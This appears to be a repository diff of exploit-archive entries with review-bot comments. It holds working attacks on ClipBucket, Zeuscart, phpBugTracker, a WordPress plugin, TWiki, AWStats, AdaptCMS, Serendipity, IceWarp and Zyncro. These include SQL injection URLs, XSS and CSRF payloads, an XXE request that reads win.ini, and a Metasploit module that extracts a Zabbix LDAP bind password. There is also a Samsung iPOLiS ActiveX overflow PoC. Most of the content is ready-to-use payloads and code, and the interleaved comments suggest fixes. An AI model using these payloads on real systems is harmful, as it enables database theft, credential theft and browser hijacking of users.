# Site : www.2600.in.th
# Vendor Homepage : http://clip-bucket.com/
# Software Link : http://sourceforge.net/projects/clipbucket/files/ClipBucket%20v2/clipbucket-2.7.0.4.v2929-rc3.zip
# Version : 2.7.0.4.v2929-rc3
# Tested on : Window and Linux
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
####################
SOFTWARE DESCRIPTION
####################
ClipBucket is an OpenSource Multimedia Management Script Provided Free to the Community.This script comes with all
the bells & whistles required to start your own Video Sharing website like Youtube, Metacafe, Veoh, Hulu or any
other top video distribution application in matter of minutes. ClipBucket is fastest growing script which was
first started as Youtube Clone but now its advance features & enhancements makes it the most versatile, reliable &
scalable media distribution platform with latest social networking features, while staying light on your pockets.
Whether you are a small fan club or a big Multi Tier Network operator, Clipbucket will fulfill your video
management needs.
##################################
VULNERABILITY: Blind SQL Injection
##################################
An attacker might execute arbitrary SQL commands on the database server with this vulnerability.
User tainted data is used when creating the database query that will be executed on the database management system (DBMS).
An attacker can inject own SQL syntax thus initiate reading, inserting or deleting database entries or attacking the underlying operating system
depending on the query, DBMS and configuration.
= POC =
GET /clipbucket/view_item.php?item=a%27%20or%20%27a%27=%27a&type=photos&collection=9 => True Condition
GET /clipbucket/view_item.php?item=a%27%20or%20%27a%27=%27b&type=photos&collection=9 => False Condition (Item does not exist.)
################################################################################################################
Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################
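Review bot: The vulnerability text is generic and never names the affected parameter; only the `= POC =` lines show that it is `item` in `view_item.php`. Adding `Vulnerable parameter: item (view_item.php)` above the POC, plus a fixed-version or mitigation line, would make the advisory usable for triage. The header gives `Version : 2.7.0.4.v2929-rc3` while the title says `2.7 RC3 0.9`; the two should be reconciled.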

86
platforms/php/webapps/36157.rb Executable file

@ -0,0 +1,86 @@
##
# This module requires Metasploit
# Date: 25-09-2013
# Author: Pablo González
# Vendor Homepage: Zabbix -> http://www.zabbix.com
# Software Link: http://www.zabbix.com
# Version: 2.0.5
# Tested On: Linux (Ubuntu, Suse, CentOS)
# CVE: CVE-2013-5572 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5572
# More Info: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-5572
# http://www.elladodelmal.com/2014/12/como-crear-el-modulo-metasploit-para-el.html
# http://seclists.org/fulldisclosure/2013/Sep/151
# http://www.cvedetails.com/cve/CVE-2013-5572/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'ldap_bind_password Zabbix CVE-2013-5572',
'Description' => %q{
Zabbix 2.0.5 allows remote authenticated users to discover the LDAP bind password by leveraging management-console access and reading the ldap_bind_password value in the HTML source code.
},
'License' => MSF_LICENSE,
'Author' => [ '@pablogonzalezpe, Pablo Gonzalez' ]
))
register_options([
OptString.new('zbx_session', [true, 'Cookie zbx_sessionid']),
OptString.new('TARGETURI', [true, 'Path Zabbix Authentication','/zabbix/authentication.php']),
OptInt.new('TIMEOUT', [true, 'HTTP read response timeout (seconds)', 5])
], self.class)
end
def run
req
end
def req
resp = send_request_cgi(
{
'host' => datastore['RHOST'],
'method' => 'POST',
'uri' => normalize_uri(target_uri.path.to_s),
'cookie' => "zbx_sessionid=#{datastore['zbx_session']}",
'content-type' => 'application/x-www-form-urlencoded'
}, datastore['TIMEOUT'])
ldap_host(resp)
user_passDomain(resp)
user_zabbix(resp)
end
def ldap_host(response)
cut = response.body.split("ldap_host\" value=\"")[1]
if cut != nil
host = cut.split("\"")[0]
print_good "LDAP Host => #{host}"
end
end
def user_passDomain(response)
cut = response.body.split("ldap_bind_dn\" value=\"")[1]
if cut != nil
user = cut.split("\"")[0]
print_good "User Domain? => #{user}"
end
cut = response.body.split("name=\"ldap_bind_password\" value=\"")[1]
if cut != nil
pass = cut.split("\"")[0]
print_good "Password Domain? => #{pass}"
end
end
def user_zabbix(response)
cut = response.body.split("user\" value=\"")[1]
if cut != nil
user = cut.split("\"")[0]
print_good "User Zabbix => #{user}"
end
end
end
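Review bot: The CVE and advisory links live only in the header comment, so they are not part of the module's metadata once it is loaded; `update_info` should carry them, e.g. `'References' => [ ['CVE', '2013-5572'] ]`. `req` passes `resp` to the three parsers without checking it, and `send_request_cgi` returns nil when the request times out, so `response.body` would raise; `return unless resp` after the request is enough. `user_passDomain` mixes snake_case and camelCase, and `cut != nil` is more idiomatic as `unless cut.nil?`. The header date 25-09-2013 also differs from the index row's 2015-02-23 without explanation.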

146
platforms/php/webapps/36159.txt Executable file

@ -0,0 +1,146 @@
Advisory: Multiple reflecting XSS-, SQLi and
InformationDisclosure-vulnerabilities in Zeuscart v.4
Advisory ID: SROEADV-2015-12
Author: Steffen Rösemann
Affected Software: Zeuscart v.4
Vendor URL: http://zeuscart.com/
Vendor Status: pending
CVE-ID: will asked to be assigned after release on FullDisclosure via
OSS-list
Software used for research: Mac OS X 10.10, Firefox 35.0.1
==========================
Vulnerability Description:
==========================
ECommerce-Shopping Cart Zeuscart v. 4 suffers from multiple XSS-, SQLi- and
InformationDisclosure-vulnerabilities.
==================
Technical Details:
==================
====
XSS
===
Reflecting XSS-vulnerabilities can be found in a common
Zeuscart-installation in the following locations and could be exploited for
example by crafting a link and make a registered user click on that link.
The parameter "search", which is used in the index.php is vulnerable to
XSS-attacks.
Exploit-Example:
http://
{TARGET}/index.php?do=search&search=%22%3E%3Cbody%20onload=eval%28alert%28document.cookie%29%29%20%3E%3C!--
By appending arbitrary HTML- and/or JavaScript-code to the parameter
"schltr" which is as well used in index.php, an attacker could exploit this
XSS-vulnerable parameter:
Exploit-Example:
http://
{TARGET}/index.php?do=brands&schltr=All%3Cbody%20onload=eval%28alert%28String.fromCharCode%2888,83,83%29%29%29%20%3E
The third XSS-vulnerability can be found in the "brand"-parameter, which is
again used in index.php.
Exploit-Example:
http://
{TARGET}/index.php?do=viewbrands&brand=Bata%3Cbody%20onload=eval%28alert%28String.fromCharCode%2888,83,83%29%29%29%20%3E
====
SQLi
====
The SQL injection-vulnerabilities can be found in the administrative
backend of Zeuscart v. 4 and reside in the following locations in a common
installation.
By appending arbitrary SQL statements to the "id"-parameter, an attacker
could exploit this SQL injection vulnerability:
Exploit-Example:
http://
{TARGET}/admin/?do=disporders&action=detail&id=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,database%28%29,34,35,version%28%29,37,38+--+
Another SQL injection vulnerability can be found here and can be exploited
by appending SQL statements to the vulnerable "cid"-parameter:
Exploit-Example:
http://
{TARGET}/admin/?do=editcurrency&cid=1+and+1=2+union+select+1,database%28%29,3,version%28%29,5+--+
The last SQL injection vulnerability I found can be found in the following
location and can be exploited by appending SQL statements to the vulnerable
"id" parameter:
http://
{TARGET}/admin/?do=subadminmgt&action=edit&id=1+and+1=2+union+select+1,version%28%29,3,database%28%29,5+--+
==============
Information Disclosure
==============
The administrative backend of Zeuscart v. 4 allows the admin to use a
functionality, which displays the PHP-installation settings via phpinfo():
http://{TARGET}/admin/?do=getphpinfo
Unfortunately, the PHP-script does not check, if an authorized admin
executes this functionality: It is possible even for unregistered users to
request the above link to see the informations, phpinfo() displays. That
could expose sensitive informations to an attacker which could lead to
further exploitation.
=========
Solution:
=========
Vendor has been notified. After releasing a patch, which seems not to
correct the issues, the vendor decided not to respond anymore to figure out
a solution together. Currently, there is no patch available to secure
Zeuscart-installations.
====================
Disclosure Timeline:
====================
21-Jan-2015 found the vulnerabilities
21-Jan-2015 - informed the developers (see [3])
21-Jan-2015 release date of this security advisory [without technical
details]
21-Jan-2015 fork of the repository to keep the vulnerable version
available for other researchers (see [5])
22-Jan-2015 - vendor responded, provided detailed information
04-Feb-2015 - vendor patches Bin/Core/Assembler.php; vulnerabilities are
still exploitable, which has been reported to the vendor (see [3])
19-Feb-2015 - asked the vendor again, if he will patch these issues (see
[3]); vendor did not respond
21-Feb-2015 - release date of this security advisory
21-Feb-2015 - send to FullDisclosure
========
Credits:
========
Vulnerabilities found and advisory written by Steffen Rösemann.
===========
References:
===========
[1] http://zeuscart.com/
[2] https://github.com/ZeusCart/zeuscart
[3] https://github.com/ZeusCart/zeuscart/issues/28
[4] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-12.html
[5] https://github.com/sroesemann/zeuscart
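Review bot: The SQLi section places all three injection points under `/admin/` but never says whether a logged-in administrator session is needed to reach them, whereas the Information Disclosure section does state that `getphpinfo` answers unauthenticated requests; the precondition should be stated for the SQLi entries as well, since it decides how the findings are triaged. Because the Solution section reports that no working patch exists, it could also carry interim guidance for operators, for example `Until a fix is available, restrict access to /admin/ at the web server (IP allow-list or additional HTTP authentication) and block requests for ?do=getphpinfo`. The CVE-ID line is still a placeholder and needs updating once an identifier is assigned.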

257
platforms/php/webapps/36160.txt Executable file

@ -0,0 +1,257 @@
Advisory: Multiple SQLi, stored/reflecting XSS- and CSRF-vulnerabilities in
phpBugTracker v.1.6.0
Advisory ID: SROEADV-2015-16
Author: Steffen Rösemann
Affected Software: phpBugTracker v.1.6.0
Vendor URL: https://github.com/a-v-k/phpBugTracker
Vendor Status: patched
CVE-ID: will asked to be assigned after release on FullDisclosure via
OSS-list
Tested on: OS X 10.10 with Firefox 35.0.1 ; Kali Linux 3.18, Iceweasel 31
==========================
Vulnerability Description:
==========================
The Issuetracker phpBugTracker v. 1.6.0 suffers from multiple SQLi-,
stored/reflected XSS- and CSRF-vulnerabilities.
==================
Technical Details:
==================
The following files used in a common phpBugTracker installation suffer from
different SQLi-, stored/reflected XSS- and CSRF-vulnerabilities:
===========
project.php
===========
SQL injection / underlaying CSRF vulnerability in project.php via id
parameter:
http://
{TARGET}/admin/project.php?op=edit_component&id=1%27+and+1=2+union+select+1,2,database%28%29,user%28%29,5,6,version%28%29,8,9,10,11,12+--+
Stored XSS via input field "project name":
http://{TARGET}/admin/project.php?op=add
executed in: e.g. http://{TARGET}/admin/project.php, http://
{TARGET}/index.php
========
user.php
========
Reflecting XSS in user.php via use_js parameter:
http://
{TARGET}/admin/user.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&user_id=1
executed in: same page
=========
group.php
=========
Reflecting XSS in group.php via use_js parameter:
http://
{TARGET}/admin/group.php?op=edit&use_js=1%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&group_id=1
executed in: same page
(Blind) SQL Injection / underlaying CSRF vulnerability in group.php via
group_id parameter (used in different operations):
http://
{TARGET}/admin/group.php?op=edit&use_js=1&group_id=1+and+SLEEP%2810%29+--+
http://
{TARGET}/admin/group.php?op=edit-role&use_js=1&group_id=8+and+substring%28version%28%29,1,1%29=5+--+
==========
status.php
==========
SQL injection / underlaying CSRF vulnerability in status.php via status_id
parameter:
http://
{TARGET}/admin/status.php?op=edit&status_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29,5+--+
Stored XSS via input field "Description":
http://{TARGET}/admin/status.php?op=edit&use_js=1&status_id=0
executed in: e.g. http://{TARGET}/admin/status.php
CSRF vulnerability in status.php (delete statuses):
<img src="http://{TARGET}/admin/status.php?op=del&status_id={NUMERIC_STATUS_ID}"
==============
resolution.php
==============
SQL injection / underlaying CSRF vulnerability in resolution.php via
resolution_id parameter:
http://
{TARGET}/admin/resolution.php?op=edit&resolution_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29+--+
CSRF vulnerability in resolution.php (delete resolutions):
<img src="http://{TARGET}/admin/resolution.php?op=del&resolution_id={NUMERIC_RESOLUTION_ID}"
============
severity.php
============
SQL injection / underlaying CSRF vulnerability in severity.php via
severity_id parameter:
http://
{TARGET}/admin/severity.php?op=edit&severity_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29,5+--+
CSRF vulnerability in severity.php (delete severities):
<img src="http://{TARGET}/admin/severity.php?op=del&severity_id={NUMERIC_SEVERITY_ID}"
Stored XSS in severity.php via input field "Description":
http://{TARGET}/admin/severity.php?op=edit&use_js=1&severity_id=0
executed in: e.g. http://{TARGET}/admin/severity.php
============
priority.php
============
SQL injection / underlaying CSRF vulnerability in priority.php via
priority_id parameter:
http://
{TARGET}/admin/priority.php?op=edit&priority_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,4,version%28%29+--+
======
os.php
======
SQL Injection / underlaying CSRF vulnerability in os.php via os_id
parameter:
http://
{TARGET}/admin/os.php?op=edit&os_id=1%27+and+1=2+union+select+1,user%28%29,database%28%29,version%28%29+--+
CSRF vulnerability in os.php (delete operating systems):
<img src="http://{TARGET}/admin/os.php?op=del&os_id={NUMERIC_OS_ID}" >
Stored XSS vulnerability in os.php via input field "Regex":
http://{TARGET}/admin/os.php?op=edit&use_js=1&os_id=0
executed in: e.g. http://{TARGET}/admin/os.php?
============
database.php
============
SQL injection / underlaying CSRF vulnerability in database.php via
database_id:
http://
{TARGET}/admin/database.php?op=edit&database_id=1%27+and+1=2+union+select+1,user%28%29,version%28%29+--+
CSRF vulnerability in database.php (delete databases):
<img src="http://{TARGET}/admin/database.php?op=del&database_id={NUMERIC_DATABASE_ID}"
Stored XSS vulnerability in database.php via input field "Name":
http://{TARGET}/admin/database.php?op=edit&use_js=1&database_id=0
========
site.php
========
CSRF vulnerability in site.php (delete sites):
<img src="http://{TARGET}/admin/site.php?op=del&site_id={NUMERIC_SITE_ID}" >
SQL injection / underlaying CSRF vulnerability in site.php via site_id
parameter:
http://
{TARGET}/admin/site.php?op=edit&site_id=5%27+and+1=2+union+select+1,version%28%29,database%28%29+--+
=======
bug.php
=======
This issue has already been assigned CVE-2004-1519, but seems to have not
been corrected since the assignment:
SQL injection / underlaying CSRF vulnerability in bug.php via project
parameter:
http://
{TARGET}/bug.php?op=add&project=1%27+and+1=2+union+select+user%28%29+--+
For details see http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1519.
=========
Solution:
=========
Update to version 1.7.0.
====================
Disclosure Timeline:
====================
03/05-Feb-2015 found the vulnerabilities
05-Feb-2015 - informed the developers (see [3])
05-Feb-2015 release date of this security advisory [without technical
details]
05-Feb-2015 - forked the Github repository, to keep it available for other
security researchers (see [4])
05/06-Feb-2015 - vendor replied, will provide a patch for the
vulnerabilities
09-Feb-2015 - vendor provided a patch (version 1.7.0, see [3]); technical
details will be released on 19th February 2015
19-Feb-2015 - release date of this security advisory
19-Feb-2015 - send to FullDisclosure
========
Credits:
========
Vulnerabilities found and advisory written by Steffen Rösemann.
===========
References:
===========
[1] https://github.com/a-v-k/phpBugTracker
[2] http://sroesemann.blogspot.de/2015/02/sroeadv-2015-16.html
[3] https://github.com/a-v-k/phpBugTracker/issues/4
[4] https://github.com/sroesemann/phpBugTracker
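Review bot: The Solution section says only `Update to version 1.7.0` and does not state whether that release also covers the bug.php finding, which the advisory itself describes as uncorrected since CVE-2004-1519 was assigned; this should be spelled out so operators know whether upgrading closes every item listed. The recurring label "SQL injection / underlaying CSRF" is never explained. Judging from the URLs shown, the edit and delete operations are plain GET requests with no anti-CSRF token, so a sentence such as `These operations accept state-changing GET requests without a token, so they can also be triggered through an administrator's browser` would make the relationship explicit (to be confirmed against the 1.7.0 patch in [3]).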

63
platforms/php/webapps/36161.txt Executable file

@ -0,0 +1,63 @@
====================================================
Product: Easy Social Icons WordPress plugin
Vendor: CyberNetikz
Tested Version: 1.2.2
Vulnerability Type: XSS [CWE-79] and CSRF [CWE-352]
Risk Level: Medium
Solution Status: Solved in version 1.2.3
Discovered and Provided: Eric Flokstra - ITsec Security Services
====================================================
[-] About the Vendor:
Easy Social Icons is a WordPress plugin and can be used to set icons on the public page in order to link to social media platforms such as LinkedIn, Twitter or Facebook.
[-] Advisory Details:
It is discovered that insufficient validation is performed on the 'image_file' parameter enabling arbitrary JavaScript to be injected. On top of that no random tokens are used to prevent CSRF attacks. By combining these vulnerabilities an attacker could for example trick an admin into setting a persistent XSS payload on the public WordPress page.
[-] Proof of Concept:
<html>
<body>
<form action="http://10.0.2.215/wordpress/wp-admin/admin.php?page=cnss_social_icon_add&mode=edit&id=1" <http://10.0.2.215/wordpress/wp-admin/admin.php?page=cnss_social_icon_add&mode=edit&id=1> method="POST" enctype="multipart/form-data">
<input type="hidden" name="title" value="Example" />
<input type="hidden" name="image&#95;file" value="http&#58;&#47;&#47;10&#46;0&#46;2&#46;215&#47;wordpress&#47;wp&#45;content&#47;uploads&#47;2015&#47;02&#47;cookie&#46;jpg"><script>alert&#40;1&#41;<&#47;script>" />
<input type="hidden" name="url" value="http&#58;&#47;&#47;www&#46;example&#46;org" />
<input type="hidden" name="sortorder" value="0" />
<input type="hidden" name="target" value="1" />
<input type="hidden" name="action" value="edit" />
<input type="hidden" name="id" value="1" />
<input type="hidden" name="submit&#95;button" value="Save&#32;Changes" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
[-] Disclosure Timeline:
[02 Feb 2015]: Vendor notification
[02 Feb 2015]: Vulnerability confirmation
[11 Feb 2015]: Vulnerability patched
[19 Feb 2015]: Public disclosure
[-] Solution:
Update to the latest version of Easy Social Icons.
[-] References:
[1] Easy Social Icons Changelog -- https://wordpress.org/plugins/easy-social-icons/changelog/
[2] Common Weakness Enumeration (CWE) -- http://cwe.mitre.org
[3] ITsec Security Services BV -- http://www.itsec.nl
------------------------------------------------------------------------
ITsec Security Services bv. (KvK. 34181927)
Postal Address:
P.O. Box 5120, 2000GC Haarlem
Visitors Address:
Kenaupark 23, 2011 MR Haarlem
Phone: +31 - (0)23 542 05 78
The information contained in this email communication is confidential and is intended solely for the use of the individual or entity to whom it is addressed and others authorized to receive it. If you are not the intended recipient, you are hereby notified that any disclosure, copying,distribution, or taking any action in reliance of the contents of this information is strictly prohibited and may be unlawful. No rights may be attached to this message. ITsec does not accept any liability for incorrect and incomplete transmission or delayed receipt of this e-mail nor for the effects or damages caused by the direct or indirect use of the information or functionality provided by this posting, nor the content contained within.Use them at your own risk.
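Review bot: The Solution line reads `Update to the latest version of Easy Social Icons` although the header pins the fix to 1.2.3; naming the release, `Update to Easy Social Icons 1.2.3 or later`, lets an administrator check an installation against the advisory. The details name the two root causes (no validation of `image_file`, no anti-CSRF token) but not what the patched version changed; presumably output escaping of the stored value and a nonce check on the admin form, which should be confirmed against the changelog in [1]. The e-mail confidentiality footer at the end of the file is mail-client residue that contradicts a public disclosure and could be dropped from the archived copy.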


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/49746/info
TWiki is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to TWiki 5.1.0 are vulnerable.
http://example.com/do/view/Main/Jump?create=on&newtopic=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert%280x0051D1%29%3C/script%3E&template=WebCreateNewTopic&topicparent=3


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/49746/info
TWiki is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Versions prior to TWiki 5.1.0 are vulnerable.
http://example.com/do/view/TWiki/ATasteOfTWiki?&#039;"--></style></script><script>alert(0x002B48)</script>

10
platforms/php/webapps/36164.txt Executable file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/49749/info
AWStats is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
AWStats 7.0 and 6.95 are vulnerable; other versions may also be affected.
http://example.com/awredir.pl?url=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://example.com/awredir.pl?key=%3Cscript%3Ealert(document.cookie)%3C/script%3E

54
platforms/php/webapps/36165.txt Executable file

@ -0,0 +1,54 @@
source: http://www.securityfocus.com/bid/49753/info
IceWarp Web Mail is prone to multiple information-disclosure vulnerabilities.
Attackers can exploit these issues to gain access to potentially sensitive information, and possibly cause denial-of-service conditions; other attacks may also be possible.
Proof-of-Concept:
The following POST request was sent to the host A.B.C.D where the IceWarp mail
server was running:
REQUEST
=========
POST /-.._._.--.._1243848280/server/webmail.php HTTP/1.1
Host:A.B.C.D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101
Firefox/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language:en-gb,en;q=0.5i've
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://A.B.C.D
Content-Length: 249
Content-Type: application/xml;
charset=UTF-8
Pragma: no-cache
Cache-Control: no-cache
<!DOCTYPE foo [<!ENTITY xxeb91c4 SYSTEM "file:///c:/windows/win.ini"> ]><iq
type="set"><query xmlns="webmail:iq:auth"><username>test&xxeb91c4;</username><digest>828cd27c6fb73ee32674602e9c5521f005c614f5fb9266fd071dab323b5079e02d47a421c01df2efffcd2bdb221e15bf2baa4acefe38f264d92d152878ca4d33</digest><method>RSA</method></query></iq>
RESPONSE:
==========
HTTP/1.1 200 OK
Server: IceWarp/9.4.2
Date: Wed, 20 Jul
2011 10:04:56 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control:no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/xml
Vary: Accept-Encoding
Content-Length: 1113
<?xml version="1.0" encoding="utf-8"?><iq type="error"><error
uid="login_invalid">test; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
....TRUNCATED
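Review bot: The description calls this an information-disclosure issue without naming the weakness, yet the request body declares an external entity in a DOCTYPE and the `login_invalid` error echoes its contents back, i.e. XML external entity processing in the webmail.php authentication handler; saying so would tell defenders what to fix and what to look for. No affected or fixed version is given beyond the `Server: IceWarp/9.4.2` response header. A short remediation line would complete the entry, e.g. `Disable DTD and external-entity resolution in the XML parser behind webmail.php, and alert on request bodies containing <!DOCTYPE or <!ENTITY`. The stray `i've` at the end of the Accept-Language header looks like a paste artefact.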

42
platforms/php/webapps/36166.txt Executable file

@ -0,0 +1,42 @@
source: http://www.securityfocus.com/bid/49765/info
Multiple products are prone to an HTML-injection vulnerability because they fail to sufficiently sanitize user-supplied input.
An attacker could exploit this vulnerability to execute arbitrary script code in the browser of an unsuspecting victim in the context of the affected websites. This may allow the attacker to steal cookie-based authentication credentials or control how the websites are rendered to the user. Other attacks are also possible.
The following products are affected:
WordPress 3.1.4
BuddyPress 1.2.10
Blogs MU 1.2.6
One of the functionalities of Zyncro is the possibility of creating
groups. The name and description of the groups are not correctly
sanitized and it's possible to provoke some attacks.
In order to do the attack, you must create a new group and capture the
packet transferred to the server to modify it because validation is
done in client-side (only) using javascript.
The original request has three POST data parameters like:
popup=1 & name=dGVzdA%3D%3D & description=dGVzdA%3D%3D
Important data are 'name' and 'description' parameters, which are
base64 encoded. In this case, both values are 'test':
url_decode(dGVzdA%3D%3D)
b64decode(dGVzdA==)
test
It is possible to provoke the XSS by changing those values as follows:
"><script>alert("XSS attack")</script>
Values MUST be in base64, so:
b64encode(""><script>alert("XSS attack")</script>") =
Ij48c2NyaXB0PmFsZXJ0KCJYU1MgYXR0YWNrIik8L3NjcmlwdD4=
Finally the post-data of the request would become:
popup=1&name=Ij48c2NyaXB0PmFsZXJ0KCJYU1MgYXR0YWNrIik8L3NjcmlwdD4%3d&description=Ij48c2NyaXB0PmFsZXJ0KCJYU1MgYXR0YWNrIik8L3NjcmlwdD4%3d
Once the request has reached the server, a new group would be created
and any time that someone sees the name/description of the group, a
pop-up would appear, this is the easiest attack.
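Review bot: The affected-products list (WordPress 3.1.4, BuddyPress 1.2.10, Blogs MU 1.2.6) does not match the technical write-up beneath it, which describes group creation in Zyncro; one of the two appears to come from a different advisory, and the file should say which product the details apply to. The write-up identifies the root cause, validation performed only in client-side JavaScript, but offers no remediation. A closing line such as `Fix: validate name and description on the server after base64-decoding and HTML-encode them on output` would complete it.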

16
platforms/php/webapps/36167.txt Executable file

@ -0,0 +1,16 @@
source: http://www.securityfocus.com/bid/49769/info
AdaptCMS is prone to multiple cross-site scripting vulnerabilities and an information disclosure vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to obtain potentially sensitive information and to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
AdaptCMS 2.0.1 is vulnerable; other versions may also be affected.
http://www.example.com/AdaptCMS/admin.php?view=[XSS]
http://www.example.com/AdaptCMS/admin.php?view=share&do=[XSS]
http://www.example.com/AdaptCMS//index.php?'[XSS]
http://www.example.com/AdaptCMS/admin.php?view=/&view=settings
http://www.example.com/AdaptCMS/admin.php?view=/&view=users
http://www.example.com/AdaptCMS/admin.php?view=/&view=groups
http://www.example.com/AdaptCMS/admin.php?view=/&view=levels
http://www.example.com/AdaptCMS/admin.php?view=/&view=stats
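Review bot: The URL list is unlabelled, so a reader cannot tell which entries illustrate the cross-site scripting issues and which illustrate the information disclosure named in the description. The last five (`admin.php?view=/&view=settings` through `view=stats`) carry no `[XSS]` marker and are presumably the disclosure cases. A one-line heading before each group, e.g. `Cross-site scripting:` and `Information disclosure:`, would remove the ambiguity.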


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/49771/info
Serendipity Freetag-plugin is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
This issue affects Serendipity Freetag-plugin 3.22; prior versions may also be affected.
http://www.example.com/serendipity/serendipity_admin?serendipity[adminModule]=event_display&serendipity[adminAction]=managetags&serendipity[tagview]=[xss]

112
platforms/windows/dos/36152.html Executable file

@ -0,0 +1,112 @@
<!--
# Exploit Title: (0day)Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC (CVE-2015-0555)
# Date: 22/02/2015
# Exploit Author: Praveen Darshanam
# Vendor Homepage: *https://www.samsung-security.com/Tools/device-manager.aspx
# Version: Samsung iPOLiS 1.12.2
# Tested on: Windows 7 Ultimate N SP1
# CVE: 2015-0555
-->
<html>
<!--
Vulnerability found and PoC coded by Praveen Darshanam
http://blog.disects.com
CVE-2015-0555
targetFile = "C:\Program Files\Samsung\iPOLiS Device Manager\XnsSdkDeviceIpInstaller.ocx"
prototype = "Function WriteConfigValue ( ByVal szKey As String , ByVal szValue As String ) As Long"
memberName = "WriteConfigValue"
progid = "XNSSDKDEVICELib.XnsSdkDevice"
Operating System = Windows 7 Ultimate N SP1
Vulnerable Software = Samsung iPOLiS 1.12.2
CERT tried to coordinate but there wasn't any response from Samsung
-->
<head> Samsung iPOLiS XnsSdkDeviceIpInstaller ActiveX WriteConfigValue Remote Code Execution PoC </head>
<object classid='clsid:D3B78638-78BA-4587-88FE-0537A0825A72' id='target'> </object>
<script>
var arg1 = "";
var arg2="praveend";
for (i=0; i<= 15000; i++)
{
arg1 += "A";
}
target.WriteConfigValue(arg1 ,arg2);
</script>
</html>
<!--
#############Stack Trace####################
Exception Code: ACCESS_VIOLATION
Disasm: 149434 MOV AL,[ESI+EDX]
Seh Chain:
--------------------------------------------------
1 647C7D7D mfc100.dll
2 647D0937 mfc100.dll
3 64E242CA VBSCRIPT.dll
4 77B3E0ED ntdll.dll
Called From Returns To
--------------------------------------------------
XNSSDKDEVICE.149434 41414141
41414141 414141
414141 3DA4C4
3DA4C4 mfc100.647790C1
mfc100.647790C1 56746C75
Registers:
--------------------------------------------------
EIP 00149434
EAX 00003841
EBX 00609FB0 -> 0015A564
ECX 00003814
EDX 00414141
EDI 0000008F
ESI 0000008F
EBP 002BE5FC -> Asc: AAAAAAAAAAA
ESP 002BE564 -> 0000000C
Block Disassembly:
--------------------------------------------------
149423 XOR EDI,EDI
149425 XOR ESI,ESI
149427 MOV [EBP-8C],ECX
14942D TEST ECX,ECX
14942F JLE SHORT 00149496
149431 MOV EDX,[EBP+8]
149434 MOV AL,[ESI+EDX] <--- CRASH
149437 CMP AL,2F
149439 JNZ SHORT 00149489
14943B MOV ECX,EBX
14943D TEST ESI,ESI
14943F JNZ SHORT 0014944D
149441 PUSH 159F28
149446 CALL 0014F7C0
14944B JMP SHORT 00149476
ArgDump:
--------------------------------------------------
EBP+8 00414141
EBP+12 003DA4C4 -> Asc: defaultV
EBP+16 647790C1 -> EBE84589
EBP+20 FFFFFFFE
EBP+24 646CBE5C -> CCCCCCC3
EBP+28 0000001C
Stack Dump:
--------------------------------------------------
2BE564 0C 00 00 00 00 E6 2B 00 B0 93 14 00 14 38 00 00 [................]
2BE574 C4 A4 3D 00 41 41 41 41 41 41 41 41 41 41 41 41 [................]
2BE584 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]
2BE594 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]
2BE5A4 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [................]
-->
